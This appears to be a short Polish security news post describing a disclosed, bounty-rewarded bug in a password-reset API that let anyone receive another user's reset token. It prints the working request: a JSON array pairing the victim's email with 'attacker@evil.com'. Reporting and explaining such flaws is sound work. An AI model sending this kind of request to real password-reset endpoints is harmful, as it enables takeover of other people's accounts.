Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Kilka znaków i zgarnął $3500 – banalny sposób na przejmowanie dowolnego konta

23 czerwca 2019, 12:15 | W biegu | 0 komentarzy

W tym newsie bardziej liczy się sposób wykorzystania podatności niż sama ofiara (upserve.com). Wydaje się Wam, że w 2019r. mechanizmy resetu hasła są na tyle bezpieczne, sprawdzone, napisane już miliony razy, że ciężko jest znaleźć w nich coś krytycznego?

Błąd.

Żeby otrzymać token umożliwiający reset hasła dowolnego użytkownika w serwisie upserve.com wystarczyło wysłać takie żądanie (resetujące hasło np. użytkownikowi: admin@breadcrumb.com, ale…dodając swojego maila otrzymywaliśmy kopię wiadomości z cennym tokenem):

POST https://hq.breadcrumb.com/api/v1/password_reset HTTP/1.1

{„email_address”:[„admin@breadcrumb.com”,”attacker@evil.com”]}

Witamy w roku 2019 :-)

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz